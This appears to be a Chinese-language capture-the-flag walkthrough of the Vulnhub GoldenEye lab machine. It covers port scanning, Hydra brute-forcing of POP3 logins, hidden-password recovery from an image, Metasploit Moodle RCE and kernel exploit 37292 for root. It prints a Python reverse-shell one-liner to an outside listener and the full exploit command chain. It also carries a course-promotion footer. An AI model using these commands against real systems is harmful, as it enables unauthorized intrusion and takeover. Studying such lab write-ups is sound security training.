【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
Vulnhub百个项目渗透
Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
作者水平很有限,如果发现错误,还望告知,感谢!
前言
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。
一、梳理流程
-
端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
-
信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
-
获取shell(利用版本漏洞或者中间件等拿到shell)
-
二次收集(基于已得到的服务或者主机再次信息收集)
-
内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
-
毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)
二、使用步骤
1.端口发现
代码如下:
ifconfig //用来查看自己的IP
namp 192.168.247.0/24 -sP //用来扫描同网段所有存活主机,注意最后是0
这个IP是你ifconfig出来的IP
nmap -p- 192.168.247.134 //扫描开放端口,找服务
(服务越多,我们越应该兴奋,因为服务多代表漏洞越多,越好下手)
开放了25和80端口还有两个55006和55007按照靶场的尿性估计有的搞,按照惯例,我们先去80看看
2.web突破
让我们去这个目录下登录
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YV37CljF-1690591080449)(https://image.3001.net/images/20221220/1671515575_63a14db7afdd695eebf6a.png!small)]一看就是一个js页面,既然是前端,就右键看一下源码
看到一个js文件,去看看这个js是什么牛马
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aopiodgO-1690591080450)(https://image.3001.net/images/20221220/1671515577_63a14db93512e06d73184.png!small)]
有这么一段牛马话,翻译一下大致意思boris,记得更新你的默认密码,这就是爆破的可能性
账户:boris,密码:InvincibleHack3r(翻译过来居然是无敌黑客3r,真自恋),还有一个账户:Natalya
到这就去登陆一下
登录之后是一个页面(这个就没截图,属实没必要),全局翻译一下
告诉我们:
也就是说有一个高的开放端口负责pop3的业务,pop3是简单的邮局协议,所以安全性很低,这个时候就应该想起之前namp扫到的55006那个端口。
进一步扫描服务
nmap -sS -sV -T5 -A -p55006,55007 192.168.195.42
每个参数都有它的意义,可以在搜一下。我会单写一篇工具使用的文章的
没有啥无密码登陆的东西,那就访问一下55007端口的pop3服务
密码爆破
访问不了,有可能是没登陆还是什么的,之前翻译那一段牛马话的时候知道了最起码boris用的是默认密码,所以就爆破,这里选择九头蛇(Hydra)工具
echo -e ‘natalya\nboris’ > rong.txt —将两个用户名写入txt文本中
hydra -L rong.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3
–上面这条命令是九头蛇自带的密码,小伙伴们自己寻找一些字典就好,
不过实际生活成功率一般
经过2~5分钟等待,获得两组账号密码:
[55007][pop3] host: 192.168.4.202 login: natalya password: bird
[55007][pop3] host: 192.168.4.202 login: boris password: secret1!
用户:boris 密码:secret1!
用户:natalya 密码:bird
有了账号密码就登陆呗,利用nc登陆即可,方便快捷
通过NC登录pop3查看邮件信封内容枚举:
nc 192.168.4.202 55007 —登录邮箱
user boris —登录用户
pass secret1! —登录密码
list —查看邮件数量
retr 1~3 —查看邮件内容
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ukNb9yVf-1690591080453)(https://image.3001.net/images/20221220/1671515581_63a14dbd2489ce3414587.png!small)]
其中一封邮件翻译过来是这个样
然后就没啥东西了,再登录natalya的账户看看
nc 192.168.4.202 55007 —登录邮箱
user natalya —登录用户
pass bird —登录密码
list —查看邮件数量
retr 1~3 —查看邮件内容
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IzaC0NEO-1690591080454)(https://image.3001.net/images/20221220/1671515582_63a14dbe3f92e735d2314.png!small)]
又知道了一组账号密码,并且要求我们做本地host,并且给了一个目录,我们做完host就去访问登录
gedit /etc/hosts -----打开hosts文件
192.168.4.202 severnaya-station.com --添加进去
登录之后源码啥的都没问题,我们到处点点,看看有啥残留的信息,邮件,或者是啥的,然后找到了:
Home / ▶ My profile / ▶ Messages —>发现有一封邮件,内容翻译发现用户名doak
再爆破doak的账户
echo doak > rong2.txt ---将用户名写入txt文本中
hydra -L rong2 -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3
[55007][pop3] host: 192.168.4.202 login: doak password: goat
获得用户名密码:doak/goat
登录doak用户枚举邮件信息
nc 192.168.4.202 55007 ---登录邮箱
user doak ---登录用户
pass goat ---登录密码
list ---查看邮件数量
retr 1 ---查看邮件内容
邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!
使用新的账户密码登录CMS
登录后在:Home / ▶ My home 右边发现: s3cret.txt
另外发现这是Moodle使用的2.2.3版本(可以搜索一下版本漏洞)一会搜
先访问一下已知文件
2.图片逆向分析
wget http://severnaya-station.com/dir007key/for-007.jpg
把图片下载到本地
一张图片,啥都没有,但是又是专门搞得,就尝试一下图片的逆向分析
binwalk(路由逆向分析工具)
exiftool(图虫)
strings(识别动态库版本指令)
等查看jpg文件底层内容!
exiftool for-007.jpg --这个好用
strings for-007.jpg
用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==
base64解码得到:xWinter1995x!
根据之前的邮件我们知道这是一个admin的密码
(翻译软件的话我建议还是别用谷歌,用deepl,非常准确翻译出来)
所以尝试登陆
用户名:admin
密码:xWinter1995x!
severnaya-station.com/gnocertdir
找了半天也没啥太大的突破,那就只能找找有没有版本漏洞(上面我们在那个docker的账户里面找到了版本号),或者内核漏洞
3.版本漏洞拿到shell
15、此版本有许多漏洞利用,选一个RCE来用就好
使用MSF
框架利用很方便
msfconsole ---进入MSF框架攻击界面
search moodle ---查找 moodle类型 攻击的模块
use 0 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本
set username admin ---设置用户名:admin
set password xWinter1995x! ---设置密码:xWinter1995x!
set rhost severnaya-station.com ---设置:rhosts severnaya-station.com
set targeturi /gnocertdir ---设置目录: /gnocertdir
set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse
set lhost 192.168.4.231
---设置:lhost 192.168.4.231(自己的IP)
exploit ----执行命令
当我们执行后发现无法成功,是因为对方需要修改执行PSpellShell
我是谷歌搜的,多翻一翻就能看懂了宝,url给到这里
https://www.exploit-db.com/exploits/29324
‘s_editor_tinymce_spellengine’ => ‘PSpellShell’,
有这么一句话所以知道要更改shell类型
然后我百度了一下这个版本的moodle怎么修改shell类型
Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editor
来到此处,修改PSpellShell然后save!
然后msf重新run一下,就拿到了shell
但是这个时候 我们的shell在msf里,非常不好用
接下来讲的非常重要,死死备注
1. 新开终端端口,开启监听
nc -vlp 6666
2. 执行tty,因为获得的权限无框架:执行
python -c 'import pty; pty.spawn("/bin/bash")'
---将shell进行tty
3. python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.28",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
利用python调用socket来达到监听的目的,万金油,就这么用,保存好,
以后直接用,还有很多协议的,没装python就用别的,总是有的用的,
我后面总结一个出来
嘎嘎好用
3.内核提权
内核提权
uname -a 查看权限
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
谷歌搜索:Linux ubuntu 3.13.0-32 exploit --就这么搜,嘎嘎准
获得exp版本:37292
kali搜索:
searchsploit 37292 —搜索kali本地的exp库中37292攻击脚本信息
所以没事就更新一下你的kali,就越来越好用
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/
—目录自行修改
按照一般思路需要gcc编译成一个可执行文件,然后执行就能提权成功
但是在实际测试环境中,发现并没有gcc的环境,我们就用cc编译也一样
gedit 37292.c ---文本打开
第143行将gcc改为cc ---编写下
然后在kali开启http服务:
python -m SimpleHTTPServer 8081
---新版的python把这个命令改了,如果你是新版的python,就执行下面这个
python -m http.server 8081//python3改版了注意
wget http://192.168.4.222:8081/37292.c ---wget下载http服务下的文件---这是在靶机的shell上执行的命令,不是
成功下载后执行cc编译:
cc -o exp 37292.c ---C语言的CC代码编译点c文件
chmod +x exp ---编译成可执行文件,并赋权(+x是最高权)
./exp ---点杠执行
id ---查看目前权限
ls
---看一下root目录下有没有flag,一般最后一个flag直接就在root下
cat /root/.flag.txt ---读取root下的flag信息
568628e0d993b1973adc718237da6e93
三.总结
1.密码爆破(九头蛇)
2.图片逆向分析(binwalk(路由逆向分析工具)
exiftool(图虫)
strings(识别动态库版本指令))
3.内核提权(没有gcc的环境的替代方法)
网络安全学习路线
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
或者扫描下方csdn官方合作二维码获取哦!
这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!
阶段一:基础入门
网络安全导论
渗透测试基础
网络基础
操作系统基础
Web安全基础
数据库基础
编程基础
CTF基础
该阶段学完年薪15w+没有问题
阶段二:技术进阶(到了这一步你才算入门)
弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞
该阶段学完年薪25w+
阶段三:高阶提升
反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练
该阶段学完即可年薪30w+
阶段四:蓝队课程
蓝队基础
蓝队进阶
该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。
攻防兼备,年薪收入可以达到40w+
阶段五:面试指南&阶段六:升级内容
需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容可在文章后方领取。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
或者扫描下方csdn官方合作二维码获取哦!
感谢您观看我的文章,谢谢!!
更多推荐
所有评论(0)